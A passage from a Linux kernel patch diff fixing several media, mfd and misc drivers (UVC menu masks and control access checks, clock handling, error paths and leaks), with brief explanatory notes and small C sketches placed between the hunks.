++	ret = devm_clk_bulk_get_all(&pdev->dev, &jpeg->clks);
++	if (ret < 0) {
++		dev_err(dev, "failed to get clock\n");
+ 		goto err_clk;
+ 	}
++	jpeg->num_clks = ret;
+ 
+ 	ret = mxc_jpeg_attach_pm_domains(jpeg);
+ 	if (ret < 0) {
+@@ -2311,32 +2304,20 @@ static int mxc_jpeg_runtime_resume(struct device *dev)
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = clk_prepare_enable(jpeg->clk_ipg);
+-	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: ipg\n");
+-		goto err_ipg;
+-	}
+-
+-	ret = clk_prepare_enable(jpeg->clk_per);
++	ret = clk_bulk_prepare_enable(jpeg->num_clks, jpeg->clks);
+ 	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: per\n");
+-		goto err_per;
++		dev_err(dev, "failed to enable clock\n");
++		return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err_per:
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-err_ipg:
+-	return ret;
+ }
+ 
+ static int mxc_jpeg_runtime_suspend(struct device *dev)
+ {
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-	clk_disable_unprepare(jpeg->clk_per);
++	clk_bulk_disable_unprepare(jpeg->num_clks, jpeg->clks);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+index c508d41a906f4..d742b638ddc93 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+@@ -114,8 +114,8 @@ struct mxc_jpeg_dev {
+ 	spinlock_t			hw_lock; /* hardware access lock */
+ 	unsigned int			mode;
+ 	struct mutex			lock; /* v4l2 ioctls serialization */
+-	struct clk			*clk_ipg;
+-	struct clk			*clk_per;
++	struct clk_bulk_data		*clks;
++	int				num_clks;
+ 	struct platform_device		*pdev;
+ 	struct device			*dev;
+ 	void __iomem			*base_reg;
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 451a4c9b3d30d..04baa80494c66 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -429,7 +429,8 @@ static void csiphy_gen2_config_lanes(struct csiphy_device *csiphy,
+ 		array_size = ARRAY_SIZE(lane_regs_sm8250[0]);
+ 		break;
+ 	default:
+-		unreachable();
++		WARN(1, "unknown cspi version\n");
++		return;
+ 	}
+ 
+ 	for (l = 0; l < 5; l++) {
+diff --git a/drivers/media/platform/ti/cal/cal.c b/drivers/media/platform/ti/cal/cal.c
+index 56b61c0583cf8..1236215ec70eb 100644
+--- a/drivers/media/platform/ti/cal/cal.c
++++ b/drivers/media/platform/ti/cal/cal.c
+@@ -1050,8 +1050,10 @@ static struct cal_ctx *cal_ctx_create(struct cal_dev *cal, int inst)
+ 	ctx->cport = inst;
+ 
+ 	ret = cal_ctx_v4l2_init(ctx);
+-	if (ret)
++	if (ret) {
++		kfree(ctx);
+ 		return NULL;
++	}
+ 
+ 	return ctx;
+ }
+diff --git a/drivers/media/platform/ti/omap3isp/isp.c b/drivers/media/platform/ti/omap3isp/isp.c
+index 24d2383400b0a..11ae479ee89c8 100644
+--- a/drivers/media/platform/ti/omap3isp/isp.c
++++ b/drivers/media/platform/ti/omap3isp/isp.c
+@@ -2308,7 +2308,16 @@ static int isp_probe(struct platform_device *pdev)
+ 
+ 	/* Regulators */
+ 	isp->isp_csiphy1.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy1");
++	if (IS_ERR(isp->isp_csiphy1.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy1.vdd);
++		goto error;
++	}
++
+ 	isp->isp_csiphy2.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy2");
++	if (IS_ERR(isp->isp_csiphy2.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy2.vdd);
++		goto error;
++	}
+ 
+ 	/* Clocks
+ 	 *
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 2c7a805289e7b..30e650edaea8a 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -161,8 +161,11 @@ static int vidioc_enum_framesizes(struct file *file, void *priv,
+ 	}
+ 
+ 	/* For non-coded formats check if postprocessing scaling is possible */
+-	if (fmt->codec_mode == HANTRO_MODE_NONE && hantro_needs_postproc(ctx, fmt)) {
+-		return hanto_postproc_enum_framesizes(ctx, fsize);
++	if (fmt->codec_mode == HANTRO_MODE_NONE) {
++		if (hantro_needs_postproc(ctx, fmt))
++			return hanto_postproc_enum_framesizes(ctx, fsize);
++		else
++			return -ENOTTY;
+ 	} else if (fsize->index != 0) {
+ 		vpu_debug(0, "invalid frame size index (expected 0, got %d)\n",
+ 			  fsize->index);
+diff --git a/drivers/media/rc/ene_ir.c b/drivers/media/rc/ene_ir.c
+index e09270916fbca..11ee21a7db8f0 100644
+--- a/drivers/media/rc/ene_ir.c
++++ b/drivers/media/rc/ene_ir.c
+@@ -1106,6 +1106,8 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 	struct ene_device *dev = pnp_get_drvdata(pnp_dev);
+ 	unsigned long flags;
+ 
++	rc_unregister_device(dev->rdev);
++	del_timer_sync(&dev->tx_sim_timer);
+ 	spin_lock_irqsave(&dev->hw_lock, flags);
+ 	ene_rx_disable(dev);
+ 	ene_rx_restore_hw_buffer(dev);
+@@ -1113,7 +1115,6 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 
+ 	free_irq(dev->irq, dev);
+ 	release_region(dev->hw_io, ENE_IO_SIZE);
+-	rc_unregister_device(dev->rdev);
+ 	kfree(dev);
+ }
+ 
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index fe9c7b3a950e8..6f443c542c6da 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,6 +179,7 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
++		cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index c95a2229f4fa9..44b0cfb8ee1c7 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
+@@ -525,7 +526,8 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+ 		.data_type	= UVC_CTRL_DATA_TYPE_BITMASK,
+ 		.menu_info	= exposure_auto_controls,
+-		.menu_count	= ARRAY_SIZE(exposure_auto_controls),
++		.menu_mask	= GENMASK(V4L2_EXPOSURE_APERTURE_PRIORITY,
++					  V4L2_EXPOSURE_AUTO),
+ 		.slave_ids	= { V4L2_CID_EXPOSURE_ABSOLUTE, },
+ 	},
+ 	{
+@@ -721,32 +723,53 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 	},
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc11[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls) - 1,
+-	},
++const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_50HZ),
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc15[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls),
+-	},
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc11 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc11[] = {
++	&uvc_ctrl_power_line_mapping_uvc11,
++	NULL, /* Sentinel */
++};
++
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc15 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_AUTO,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc15[] = {
++	&uvc_ctrl_power_line_mapping_uvc15,
++	NULL, /* Sentinel */
+ };
+ 
+ /* ------------------------------------------------------------------------
+@@ -975,7 +998,9 @@ static s32 __uvc_ctrl_get_value(struct uvc_control_mapping *mapping,
+ 		const struct uvc_menu_info *menu = mapping->menu_info;
+ 		unsigned int i;
+ 
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == value) {
+ 				value = i;
+ 				break;
+@@ -1085,11 +1110,28 @@ static int uvc_query_v4l2_class(struct uvc_video_chain *chain, u32 req_id,
+ 	return 0;
+ }
+ 
++/*
++ * Check if control @v4l2_id can be accessed by the given control @ioctl
++ * (VIDIOC_G_EXT_CTRLS, VIDIOC_TRY_EXT_CTRLS or VIDIOC_S_EXT_CTRLS).
++ *
++ * For set operations on slave controls, check if the master's value is set to
++ * manual, either in the others controls set in the same ioctl call, or from
++ * the master's current value. This catches VIDIOC_S_EXT_CTRLS calls that set
++ * both the master and slave control, such as for instance setting
++ * auto_exposure=1, exposure_time_absolute=251.
++ */
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read)
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl)
+ {
++	struct uvc_control_mapping *master_map = NULL;
++	struct uvc_control *master_ctrl = NULL;
+ 	struct uvc_control_mapping *mapping;
+ 	struct uvc_control *ctrl;
++	bool read = ioctl == VIDIOC_G_EXT_CTRLS;
++	s32 val;
++	int ret;
++	int i;
+ 
+ 	if (__uvc_query_v4l2_class(chain, v4l2_id, 0) >= 0)
+ 		return -EACCES;
+@@ -1104,6 +1146,29 @@ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+ 	if (!(ctrl->info.flags & UVC_CTRL_FLAG_SET_CUR) && !read)
+ 		return -EACCES;
+ 
++	if (ioctl != VIDIOC_S_EXT_CTRLS || !mapping->master_id)
++		return 0;
++
++	/*
++	 * Iterate backwards in cases where the master control is accessed
++	 * multiple times in the same ioctl. We want the last value.
++	 */
++	for (i = ctrls->count - 1; i >= 0; i--) {
++		if (ctrls->controls[i].id == mapping->master_id)
++			return ctrls->controls[i].value ==
++					mapping->master_manual ? 0 : -EACCES;
++	}
++
++	__uvc_find_control(ctrl->entity, mapping->master_id, &master_map,
++			   &master_ctrl, 0);
++
++	if (!master_ctrl || !(master_ctrl->info.flags & UVC_CTRL_FLAG_GET_CUR))
++		return 0;
++
++	ret = __uvc_ctrl_get(chain, master_ctrl, master_map, &val);
++	if (ret >= 0 && val != mapping->master_manual)
++		return -EACCES;
++
+ 	return 0;
+ }
+ 
+@@ -1169,12 +1234,14 @@ static int __uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+ 
+ 	switch (mapping->v4l2_type) {
+ 	case V4L2_CTRL_TYPE_MENU:
+-		v4l2_ctrl->minimum = 0;
+-		v4l2_ctrl->maximum = mapping->menu_count - 1;
++		v4l2_ctrl->minimum = ffs(mapping->menu_mask) - 1;
++		v4l2_ctrl->maximum = fls(mapping->menu_mask) - 1;
+ 		v4l2_ctrl->step = 1;
+ 
+ 		menu = mapping->menu_info;
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == v4l2_ctrl->default_value) {
+ 				v4l2_ctrl->default_value = i;
+ 				break;
+@@ -1289,7 +1356,7 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 		goto done;
+ 	}
+ 
+-	if (query_menu->index >= mapping->menu_count) {
++	if (!test_bit(query_menu->index, &mapping->menu_mask)) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+@@ -1797,8 +1864,13 @@ int uvc_ctrl_set(struct uvc_fh *handle,
+ 		break;
+ 
+ 	case V4L2_CTRL_TYPE_MENU:
+-		if (xctrl->value < 0 || xctrl->value >= mapping->menu_count)
++		if (xctrl->value < (ffs(mapping->menu_mask) - 1) ||
++		    xctrl->value > (fls(mapping->menu_mask) - 1))
+ 			return -ERANGE;
++
++		if (!test_bit(xctrl->value, &mapping->menu_mask))
++			return -EINVAL;
++
+ 		value = mapping->menu_info[xctrl->value].value;
+ 
+ 		/*
+@@ -2237,7 +2309,7 @@ static int __uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
+ 
+ 	INIT_LIST_HEAD(&map->ev_subs);
+ 
+-	size = sizeof(*mapping->menu_info) * mapping->menu_count;
++	size = sizeof(*mapping->menu_info) * fls(mapping->menu_mask);
+ 	map->menu_info = kmemdup(mapping->menu_info, size, GFP_KERNEL);
+ 	if (map->menu_info == NULL) {
+ 		kfree(map->name);
+@@ -2421,8 +2493,7 @@ static void uvc_ctrl_prune_entity(struct uvc_device *dev,
+ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 			       struct uvc_control *ctrl)
+ {
+-	const struct uvc_control_mapping *mappings;
+-	unsigned int num_mappings;
++	const struct uvc_control_mapping **mappings;
+ 	unsigned int i;
+ 
+ 	/*
+@@ -2489,16 +2560,11 @@ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 	}
+ 
+ 	/* Finally process version-specific mappings. */
+-	if (chain->dev->uvc_version < 0x0150) {
+-		mappings = uvc_ctrl_mappings_uvc11;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc11);
+-	} else {
+-		mappings = uvc_ctrl_mappings_uvc15;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc15);
+-	}
++	mappings = chain->dev->uvc_version < 0x0150
++		 ? uvc_ctrl_mappings_uvc11 : uvc_ctrl_mappings_uvc15;
+ 
+-	for (i = 0; i < num_mappings; ++i) {
+-		const struct uvc_control_mapping *mapping = &mappings[i];
++	for (i = 0; mappings[i]; ++i) {
++		const struct uvc_control_mapping *mapping = mappings[i];
+ 
+ 		if (uvc_entity_match_guid(ctrl->entity, mapping->entity) &&
+ 		    ctrl->info.selector == mapping->selector)
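
The menu_count field is replaced by menu_mask, a bitmask in which bit n set means menu index n is valid. GENMASK() builds the contiguous ranges, ffs()/fls() yield the minimum and maximum indices reported to userspace, and test_bit() rejects holes, which is how the UVC 1.1 mapping keeps index numbering stable while excluding the Auto entry. How the checks fall out, sketched:

        unsigned long mask = GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
                                     V4L2_CID_POWER_LINE_FREQUENCY_DISABLED);
        int min = ffs(mask) - 1;          /* lowest set bit -> minimum index */
        int max = fls(mask) - 1;          /* highest set bit -> maximum index */
        bool ok = test_bit(index, &mask); /* per-entry validity */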
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index 215fb483efb00..abfe735f6ea30 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/atomic.h>
++#include <linux/bits.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -2373,23 +2374,6 @@ MODULE_PARM_DESC(timeout, "Streaming control requests timeout");
+  * Driver initialization and cleanup
+  */
+ 
+-static const struct uvc_menu_info power_line_frequency_controls_limited[] = {
+-	{ 1, "50 Hz" },
+-	{ 2, "60 Hz" },
+-};
+-
+-static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
+-	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-	.entity		= UVC_GUID_UVC_PROCESSING,
+-	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-	.size		= 2,
+-	.offset		= 0,
+-	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-	.menu_info	= power_line_frequency_controls_limited,
+-	.menu_count	= ARRAY_SIZE(power_line_frequency_controls_limited),
+-};
+-
+ static const struct uvc_device_info uvc_ctrl_power_line_limited = {
+ 	.mappings = (const struct uvc_control_mapping *[]) {
+ 		&uvc_ctrl_power_line_mapping_limited,
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index f4d4c33b6dfbd..0774a11360c03 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bits.h>
+ #include <linux/compat.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -80,7 +81,7 @@ static int uvc_ioctl_ctrl_map(struct uvc_video_chain *chain,
+ 			goto free_map;
+ 		}
+ 
+-		map->menu_count = xmap->menu_count;
++		map->menu_mask = GENMASK(xmap->menu_count - 1, 0);
+ 		break;
+ 
+ 	default:
+@@ -1020,8 +1021,7 @@ static int uvc_ctrl_check_access(struct uvc_video_chain *chain,
+ 	int ret = 0;
+ 
+ 	for (i = 0; i < ctrls->count; ++ctrl, ++i) {
+-		ret = uvc_ctrl_is_accessible(chain, ctrl->id,
+-					    ioctl == VIDIOC_G_EXT_CTRLS);
++		ret = uvc_ctrl_is_accessible(chain, ctrl->id, ctrls, ioctl);
+ 		if (ret)
+ 			break;
+ 	}
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index df93db259312e..1227ae63f85b7 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -117,7 +117,7 @@ struct uvc_control_mapping {
+ 	u32 data_type;
+ 
+ 	const struct uvc_menu_info *menu_info;
+-	u32 menu_count;
++	unsigned long menu_mask;
+ 
+ 	u32 master_id;
+ 	s32 master_manual;
+@@ -728,6 +728,7 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags);
+ void uvc_status_stop(struct uvc_device *dev);
+ 
+ /* Controls */
++extern const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited;
+ extern const struct v4l2_subscribed_event_ops uvc_ctrl_sub_ev_ops;
+ 
+ int uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+@@ -761,7 +762,8 @@ static inline int uvc_ctrl_rollback(struct uvc_fh *handle)
+ int uvc_ctrl_get(struct uvc_video_chain *chain, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_set(struct uvc_fh *handle, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read);
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl);
+ 
+ int uvc_xu_ctrl_query(struct uvc_video_chain *chain,
+ 		      struct uvc_xu_control_query *xqry);
+diff --git a/drivers/media/v4l2-core/v4l2-h264.c b/drivers/media/v4l2-core/v4l2-h264.c
+index 72bd64f651981..c00197d095e75 100644
+--- a/drivers/media/v4l2-core/v4l2-h264.c
++++ b/drivers/media/v4l2-core/v4l2-h264.c
+@@ -305,6 +305,8 @@ static const char *format_ref_list_p(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+@@ -343,6 +345,8 @@ static const char *format_ref_list_b(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-jpeg.c b/drivers/media/v4l2-core/v4l2-jpeg.c
+index c2513b775f6a7..94435a7b68169 100644
+--- a/drivers/media/v4l2-core/v4l2-jpeg.c
++++ b/drivers/media/v4l2-core/v4l2-jpeg.c
+@@ -460,7 +460,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	/* Check for "Adobe\0" in Ap1..6 */
+ 	if (stream->curr + 6 > stream->end ||
+ 	    strncmp(stream->curr, "Adobe\0", 6))
+-		return -EINVAL;
++		return jpeg_skip(stream, lp - 2);
+ 
+ 	/* get to Ap12 */
+ 	ret = jpeg_skip(stream, 11);
+@@ -474,7 +474,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	*tf = ret;
+ 
+ 	/* skip the rest of the segment, this ensures at least it is complete */
+-	skip = lp - 2 - 11;
++	skip = lp - 2 - 11 - 1;
+ 	return jpeg_skip(stream, skip);
+ }
+ 
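The two hunks above adjust how many bytes of a JPEG APP14 segment remain to be skipped. The segment length lp counts its own two length bytes; the parser then peeks at the 6-byte "Adobe\0" marker without consuming it, skips 11 bytes to reach Ap12, and reads 1 transform byte, so lp - 2 - 11 - 1 bytes are left. A tiny standalone sketch of the bookkeeping (the function name is illustrative, not the driver's API):

#include <stdio.h>

/* Remaining payload of a JPEG APP14 segment after parsing, mirroring the
 * arithmetic in jpeg_parse_app14_data(): lp includes the 2 length bytes,
 * 11 bytes are skipped to reach Ap12, and 1 transform byte is consumed. */
static int app14_remaining(int lp)
{
	return lp - 2 - 11 - 1;
}

int main(void)
{
	/* A typical Adobe APP14 segment has lp = 14, so nothing is left:
	 * 2 (length) + 5 ("Adobe") + 1 (NUL/version start) + 5 + 1 = 14. */
	printf("lp=14 -> skip %d bytes\n", app14_remaining(14));
	return 0;
}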
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 9940e2724c05d..9da8235cb6900 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -15,6 +15,7 @@ config MFD_CS5535
+ 	tristate "AMD CS5535 and CS5536 southbridge core functions"
+ 	select MFD_CORE
+ 	depends on PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This is the core driver for CS5535/CS5536 MFD functions.  This is
+ 	  necessary for using the board's GPIO and MFGPT functionality.
+diff --git a/drivers/mfd/pcf50633-adc.c b/drivers/mfd/pcf50633-adc.c
+index 5cd653e615125..191b1bc6141c2 100644
+--- a/drivers/mfd/pcf50633-adc.c
++++ b/drivers/mfd/pcf50633-adc.c
+@@ -136,6 +136,7 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 			     void *callback_param)
+ {
+ 	struct pcf50633_adc_request *req;
++	int ret;
+ 
+ 	/* req is freed when the result is ready, in interrupt handler */
+ 	req = kmalloc(sizeof(*req), GFP_KERNEL);
+@@ -147,7 +148,11 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 	req->callback = callback;
+ 	req->callback_param = callback_param;
+ 
+-	return adc_enqueue_request(pcf, req);
++	ret = adc_enqueue_request(pcf, req);
++	if (ret)
++		kfree(req);
++
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(pcf50633_adc_async_read);
+ 
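The pcf50633 fix plugs a leak: on success the request is freed later by the interrupt handler, but on failure nobody owned it. The general pattern, where the callee takes ownership only when it returns 0, in a minimal sketch (all names here are illustrative):

#include <stdlib.h>

struct request { int mux; };

/* Hypothetical enqueue: takes ownership of req only on success. */
static int enqueue(struct request *req)
{
	(void)req;
	return -1;	/* pretend the queue is unavailable */
}

static int async_read(int mux)
{
	struct request *req = malloc(sizeof(*req));
	int ret;

	if (!req)
		return -1;
	req->mux = mux;

	ret = enqueue(req);
	if (ret)
		free(req);	/* failure: ownership never transferred */

	return ret;	/* success: the completion path frees req */
}

int main(void) { return async_read(0), 0; }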
+diff --git a/drivers/misc/eeprom/idt_89hpesx.c b/drivers/misc/eeprom/idt_89hpesx.c
+index bb3ed352b95f9..367054e0ced4e 100644
+--- a/drivers/misc/eeprom/idt_89hpesx.c
++++ b/drivers/misc/eeprom/idt_89hpesx.c
+@@ -1566,12 +1566,20 @@ static struct i2c_driver idt_driver = {
+  */
+ static int __init idt_init(void)
+ {
++	int ret;
++
+ 	/* Create Debugfs directory first */
+ 	if (debugfs_initialized())
+ 		csr_dbgdir = debugfs_create_dir("idt_csr", NULL);
+ 
+ 	/* Add new i2c-device driver */
+-	return i2c_add_driver(&idt_driver);
++	ret = i2c_add_driver(&idt_driver);
++	if (ret) {
++		debugfs_remove_recursive(csr_dbgdir);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(idt_init);
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 80811e852d8fd..02d26160c64e6 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2127,7 +2127,18 @@ static int fastrpc_rpmsg_probe(struct rpmsg_device *rpdev)
+ 	data->domain_id = domain_id;
+ 	data->rpdev = rpdev;
+ 
+-	return of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	err = of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	if (err)
++		goto populate_error;
++
++	return 0;
++
++populate_error:
++	if (data->fdevice)
++		misc_deregister(&data->fdevice->miscdev);
++	if (data->secure_fdevice)
++		misc_deregister(&data->secure_fdevice->miscdev);
++
+ fdev_error:
+ 	kfree(data);
+ 	return err;
+diff --git a/drivers/misc/habanalabs/common/command_submission.c b/drivers/misc/habanalabs/common/command_submission.c
+index fa05770865c65..1071bf492e423 100644
+--- a/drivers/misc/habanalabs/common/command_submission.c
++++ b/drivers/misc/habanalabs/common/command_submission.c
+@@ -3091,19 +3091,18 @@ start_over:
+ 			goto start_over;
+ 		}
+ 	} else {
++		/* Fill up the new registration node info */
++		requested_offset_record->ts_reg_info.buf = buf;
++		requested_offset_record->ts_reg_info.cq_cb = cq_cb;
++		requested_offset_record->ts_reg_info.timestamp_kernel_addr =
++				(u64 *) ts_buff->user_buff_address + ts_offset;
++		requested_offset_record->cq_kernel_addr =
++				(u64 *) cq_cb->kernel_address + cq_offset;
++		requested_offset_record->cq_target_value = target_value;
++
+ 		spin_unlock_irqrestore(wait_list_lock, flags);
+ 	}
+ 
+-	/* Fill up the new registration node info */
+-	requested_offset_record->ts_reg_info.in_use = 1;
+-	requested_offset_record->ts_reg_info.buf = buf;
